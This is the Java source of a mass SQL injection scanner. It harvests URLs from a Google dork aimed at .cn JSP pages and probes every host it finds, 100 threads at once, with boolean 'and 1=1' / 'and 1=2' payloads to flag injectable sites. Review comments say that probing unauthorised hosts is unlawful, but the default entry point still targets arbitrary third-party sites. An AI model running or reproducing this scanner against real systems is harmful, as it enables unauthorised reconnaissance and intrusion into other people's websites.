Main.java
package cn.liuyq.sql.injection.main;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.UnsupportedEncodingException;
import java.net.HttpURLConnection;
import java.net.MalformedURLException;
import java.net.URL;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.TreeSet;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import cn.liuyq.sql.injection.task.InjectionTask;
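public class Main {
    /**
     * Harvests candidate URLs from a Google query and hands every distinct host
     * to an {@link InjectionTask} for a boolean-based SQL injection check.
     *
     * NOTE(review): the dork below selects arbitrary third-party sites. Sending
     * probe requests to hosts you are not explicitly authorised to test is
     * unlawful in most jurisdictions; filter the harvested list down to
     * in-scope targets before calling {@link #runTask}.
     */

    /** Opening tag that wrapped the displayed URL of a hit in the 2010-era google.com.hk result page. */
    private static final String START_SEARCH_KEY_WORD = "<font color=\"green\">";
    /** Closing tag of the same snippet. */
    private static final String END_SEARCH_KEY_WORD = "</font>";
    /** Search URL prefix; the already-encoded dork is appended right after {@code q=}. */
    private static final String GOODLE_SERACH_PART_ONE = "http://www.google.com.hk/search?num=100&hl=zh-CN&newwindow=1&safe=strict&q=";
    /** Search URL suffix (first page of results). */
    private static final String GOODLE_SERACH_PART_TWO = "&btnG=Google+%E6%90%9C%E7%B4%A2&meta=&aq=f&aqi=&aql=&oq=&gs_rfai=&start=0";
    private static final String REQUEST_PROPERTY_KEY = "User-Agent";
    /** Browser-like User-Agent sent to the search engine (a non-browser UA is typically refused). */
    private static final String REQUEST_PROPERTY_VALUE = "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)";
    /** Connect/read timeout for the search request, so a stalled search cannot hang the whole run. */
    private static final int HTTP_SOCKET_TIMEOUT = 5000;

    /**
     * Entry point: searches for the hard-coded dork and probes every harvested host.
     *
     * @param args ignored
     * @throws Throwable any failure of the search request or of the task pool
     */
    public static void main(String[] args) throws Throwable {
        // Silence commons-logging output from the HttpClient used by Util.
        System.setProperty("org.apache.commons.logging.Log", "org.apache.commons.logging.impl.NoOpLog");
        String searchKeyWord = "allinurl: .cn/jsp?id=";
        // 100 concurrent probes is aggressive; lower it for anything resembling production.
        int threadCount = 100;
        List<InjectionTask> searchedUrl = getMactchedAddress(searchKeyWord);
        runTask(searchedUrl, threadCount);
    }

    /**
     * Runs the search and converts each distinct harvested host into an {@link InjectionTask}.
     *
     * @param searchKeyWord raw dork; only {@code ? = :} and space are percent-encoded
     * @return one task per distinct host, in result-page order (possibly empty)
     * @throws IOException if the search request fails (the two more specific
     *         declared types are subclasses of it and kept for signature compatibility)
     */
    private static List<InjectionTask> getMactchedAddress(String searchKeyWord) throws MalformedURLException,
            IOException, UnsupportedEncodingException {
        // Minimal hand-rolled encoding: covers exactly the characters the dork uses.
        String encodedQuery = searchKeyWord.replace("?", "%3F").replace("=", "%3D")
                .replace(":", "%3A").replace(" ", "+");
        URL url = new URL(GOODLE_SERACH_PART_ONE + encodedQuery + GOODLE_SERACH_PART_TWO);
        HttpURLConnection con = null;
        InputStream is = null;
        try {
            con = (HttpURLConnection) url.openConnection();
            con.setRequestProperty(REQUEST_PROPERTY_KEY, REQUEST_PROPERTY_VALUE);
            con.setConnectTimeout(HTTP_SOCKET_TIMEOUT);
            con.setReadTimeout(HTTP_SOCKET_TIMEOUT);
            is = con.getInputStream();
            List<URL> targets = extractTargetUrls(readAll(is));
            List<InjectionTask> tasks = new ArrayList<InjectionTask>(targets.size());
            for (URL target : targets) {
                tasks.add(new InjectionTask(target));
            }
            return tasks;
        } finally {
            if (is != null) {
                is.close();
            }
            if (con != null) {
                con.disconnect();
            }
        }
    }

    /**
     * Reads the whole stream as GB2312 text. Lines are concatenated without
     * separators, which is what the tag scan below expects.
     */
    private static String readAll(InputStream is) throws IOException {
        BufferedReader br = new BufferedReader(new InputStreamReader(is, "GB2312"));
        StringBuilder sb = new StringBuilder();
        String line;
        while ((line = br.readLine()) != null) {
            sb.append(line);
        }
        return sb.toString();
    }

    /**
     * Scans the result page for {@code <font color="green">URL - ...</font>}
     * snippets and returns the URL part of each, de-duplicated by host.
     *
     * A snippet without a closing tag ends the scan instead of throwing
     * StringIndexOutOfBounds, and a snippet that is not a well-formed URL is
     * skipped instead of aborting the whole harvest.
     *
     * @param html the search result page
     * @return distinct-host URLs in page order (empty if nothing matched)
     */
    private static List<URL> extractTargetUrls(String html) {
        List<URL> targets = new ArrayList<URL>();
        Map<String, URL> seenHosts = new HashMap<String, URL>();
        int beginPosition = 0;
        int position;
        while ((position = html.indexOf(START_SEARCH_KEY_WORD, beginPosition)) >= 0) {
            int start = position + START_SEARCH_KEY_WORD.length();
            int end = html.indexOf(END_SEARCH_KEY_WORD, start);
            if (end < 0) {
                break;
            }
            String matched = html.substring(start, end)
                    .replace("%3F", "?").replace("%3D", "=").replace("%26", "&");
            // The snippet is "URL - description"; keep everything before the last " -".
            int dash = matched.lastIndexOf("-");
            if (dash > 0) {
                String candidate = matched.substring(0, dash - 1);
                try {
                    URL target = new URL(candidate);
                    String host = target.getHost();
                    if (!seenHosts.containsKey(host)) {
                        seenHosts.put(host, target);
                        targets.add(target);
                    }
                } catch (MalformedURLException ignored) {
                    // Not a URL (e.g. a truncated snippet): skip this hit.
                }
            }
            beginPosition = end + END_SEARCH_KEY_WORD.length();
        }
        return targets;
    }

    /**
     * Runs all tasks on a fixed pool and blocks until every one has finished.
     *
     * @param searchedUrl tasks to execute; an empty list returns immediately
     * @param threadCount pool size, must be positive
     * @throws Throwable if the pool is interrupted while waiting
     */
    public static void runTask(List<InjectionTask> searchedUrl, int threadCount)
            throws Throwable {
        ExecutorService service = Executors.newFixedThreadPool(threadCount);
        try {
            service.invokeAll(searchedUrl);
        } finally {
            service.shutdown();
        }
    }
}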
InjectionTask.java
package cn.liuyq.sql.injection.task;
import java.net.URL;
import java.util.ArrayList;
import java.util.List;
import java.util.concurrent.Callable;
import cn.liuyq.sql.injection.main.Main;
import cn.liuyq.sql.injection.util.Util;
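public class InjectionTask implements Callable<Object> {
    /**
     * One probe of a single URL via {@link Util#confirmInjection(String)}.
     * Prints the URL to stdout when the check reports a differential.
     */

    private final URL url;

    /**
     * @param url the URL to probe (must include the injectable query parameter)
     * @throws NullPointerException if {@code url} is null
     */
    public InjectionTask(URL url) {
        if (url == null) {
            throw new NullPointerException("url");
        }
        this.url = url;
    }

    /** Host of the probed URL; used by the harvester to de-duplicate targets. */
    public String getHost() {
        return url.getHost();
    }

    /**
     * Probes the URL once and pauses 200 ms afterwards.
     *
     * Probe failures are reported on stderr and never propagate, so one bad
     * host cannot break the pool; an interrupt is re-asserted so that an
     * executor shutdown is honoured instead of silently swallowed.
     *
     * @return {@code Boolean.TRUE} if the check reported a differential, else {@code Boolean.FALSE}
     */
    @Override
    public Object call() throws Exception {
        boolean vulnerable = false;
        try {
            vulnerable = Util.confirmInjection(url.toString());
            if (vulnerable) {
                System.out.println(url.toString() + "--------true");
            }
        } catch (InterruptedException e) {
            Thread.currentThread().interrupt();
        } catch (Throwable e) {
            // confirmInjection declares Throwable; keep the task best-effort but visible.
            System.err.println(url.getHost() + ": " + e);
        }
        try {
            Thread.sleep(200);
        } catch (InterruptedException e) {
            Thread.currentThread().interrupt();
        }
        return Boolean.valueOf(vulnerable);
    }

    @Override
    public String toString() {
        return url.toString();
    }

    /**
     * Demo: one task plus the three raw requests the check is built from.
     * Targets the author's own local test application (the host Util.main
     * uses) rather than a third-party site -- never point this at a host you
     * are not authorised to test.
     */
    public static void main(String[] args) throws Throwable {
        String target = "http://192.168.1.83:9090/Test/segment.do?id=2051";
        List<InjectionTask> taskList = new ArrayList<InjectionTask>();
        taskList.add(new InjectionTask(new URL(target)));
        Main.runTask(taskList, 1);
        Util.post(target);
        Util.post(Util.replaceBlank(target + " and 1=1"));
        Util.post(Util.replaceBlank(target + " and 1=2"));
    }
}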
Util.java
1package cn.liuyq.sql.injection.util;
3import java.io.BufferedReader;
4import java.io.IOException;
5import java.io.InputStream;
6import java.io.InputStreamReader;
7import java.net.HttpURLConnection;
8import java.net.URL;
10import org.apache.commons.httpclient.DefaultHttpMethodRetryHandler;
11import org.apache.commons.httpclient.HttpClient;
12import org.apache.commons.httpclient.HttpStatus;
13import org.apache.commons.httpclient.methods.GetMethod;
14import org.apache.commons.httpclient.params.HttpClientParams;
15import org.apache.commons.httpclient.params.HttpMethodParams;
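public class Util {
    /**
     * HTTP helpers for a boolean-based SQL injection differential check.
     *
     * The check is a heuristic: it compares status codes and body lengths of
     * the baseline request against {@code and 1=1} / {@code and 1=2} variants.
     * Dynamic pages (timestamps, ads, session tokens) can produce false
     * positives or negatives; confirm by hand before reporting.
     */

    private static final int HTTP_SOCKET_TIMEOUT = 5000;
    private static final String REQUEST_PROPERTY_KEY = "User-Agent";
    private static final String REQUEST_PROPERTY_VALUE = "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)";

    /** Suffixes appended to the target URL. Only the first two are used by {@link #confirmInjection}. */
    private static final String[] INJECTION_SQL_ARRAY = new String[] {
            " and 1=1",
            " and 1=2",
            " #123",
            " --123"
    };

    /** Status value {@link #post} returns when no HTTP response was obtained at all. */
    private static final int NO_RESPONSE = 0;

    private Util() {
        // static helpers only
    }

    public static void main(String[] args) throws Throwable {
        System.out.println(confirmInjection("http://192.168.1.83:9090/Test/segment.do?id=2051"));
    }

    /**
     * Stub: always answers {@link DatabaseType#ORACLE}; no fingerprinting is implemented.
     *
     * @param url unused
     */
    public static DatabaseType confirmDataBase(String url) {
        return DatabaseType.ORACLE;
    }

    /**
     * Differential check of {@code url} against its {@code and 1=1} and {@code and 1=2} variants.
     *
     * Reports {@code true} when the true-condition variant behaves like the
     * baseline while the false-condition variant differs, first by status
     * code and, if all three are 200, by body length. A variant that got no
     * response at all (timeout, connection refused) is treated as inconclusive
     * rather than as a differential, which the original logic did not do.
     *
     * @param url target URL whose last query parameter is the injection point
     * @return {@code true} if the heuristic reports a differential
     */
    public static boolean confirmInjection(String url) throws Throwable {
        int[] baseline = post(url);
        if (baseline[0] != HttpStatus.SC_OK) {
            return false;
        }
        int[] trueProbe = post(replaceBlank(url + INJECTION_SQL_ARRAY[0]));
        int[] falseProbe = post(replaceBlank(url + INJECTION_SQL_ARRAY[1]));
        if (trueProbe[0] == NO_RESPONSE || falseProbe[0] == NO_RESPONSE) {
            return false;
        }
        if (baseline[0] == trueProbe[0] && trueProbe[0] != falseProbe[0]) {
            return true;
        }
        // Same status everywhere (necessarily 200 for the baseline): fall back to body length.
        if (trueProbe[0] == HttpStatus.SC_OK && falseProbe[0] == HttpStatus.SC_OK) {
            return baseline[1] == trueProbe[1] && trueProbe[1] != falseProbe[1];
        }
        return false;
    }

    /**
     * Issues one GET (despite the name) with no retries and a 5 s timeout.
     *
     * @param url request URL; must already be percent-encoded
     * @return {@code {status, bodyLengthInBytes}}; {@code {NO_RESPONSE, 0}} if the
     *         request failed or the body could not be read. Byte length is used
     *         instead of decoded-string length so the figure does not depend on
     *         the platform charset.
     */
    public static int[] post(String url) {
        int[] result = new int[] { NO_RESPONSE, 0 };
        HttpClientParams hcp = new HttpClientParams();
        hcp.setSoTimeout(HTTP_SOCKET_TIMEOUT);
        HttpClient client = new HttpClient(hcp);
        // setSoTimeout covers reads only; bound the connect phase as well.
        client.getHttpConnectionManager().getParams().setConnectionTimeout(HTTP_SOCKET_TIMEOUT);
        client.getParams().setParameter(HttpMethodParams.RETRY_HANDLER,
                new DefaultHttpMethodRetryHandler(0, false));
        client.getParams().setParameter(HttpMethodParams.USER_AGENT, REQUEST_PROPERTY_VALUE);
        GetMethod get = new GetMethod(url);
        try {
            result[0] = client.executeMethod(get);
            byte[] body = get.getResponseBody();
            // Responses without a body (e.g. 204/304) yield null here.
            result[1] = body == null ? 0 : body.length;
        } catch (Exception e) {
            // Failed or partially read request: signal "no response" to the caller.
            result[0] = NO_RESPONSE;
            result[1] = 0;
        } finally {
            get.releaseConnection();
        }
        return result;
    }

    /**
     * Fetches {@code url} with {@link HttpURLConnection} and returns the body
     * decoded as GB2312 with line breaks removed; an empty (or partial) string
     * on any failure.
     */
    public static String openConnection(String url) {
        StringBuilder sb = new StringBuilder();
        HttpURLConnection con = null;
        InputStream is = null;
        try {
            con = (HttpURLConnection) new URL(url).openConnection();
            con.setRequestProperty(REQUEST_PROPERTY_KEY, REQUEST_PROPERTY_VALUE);
            con.setConnectTimeout(HTTP_SOCKET_TIMEOUT);
            con.setReadTimeout(HTTP_SOCKET_TIMEOUT);
            is = con.getInputStream();
            BufferedReader br = new BufferedReader(new InputStreamReader(is, "GB2312"));
            String line;
            while ((line = br.readLine()) != null) {
                sb.append(line);
            }
        } catch (Exception e) {
            // Best effort, as before: malformed URL, non-HTTP scheme or I/O error yields what was read so far.
        } finally {
            if (is != null) {
                try {
                    is.close();
                } catch (IOException ignored) {
                    // nothing useful to do on close failure
                }
            }
            if (con != null) {
                con.disconnect();
            }
        }
        return sb.toString();
    }

    /** Percent-encodes spaces only; every other character is passed through unchanged. */
    public static String replaceBlank(String url) {
        return url.replace(" ", "%20");
    }

    public enum DatabaseType {
        ORACLE(), MSSQL(), MYSQL();
    }
}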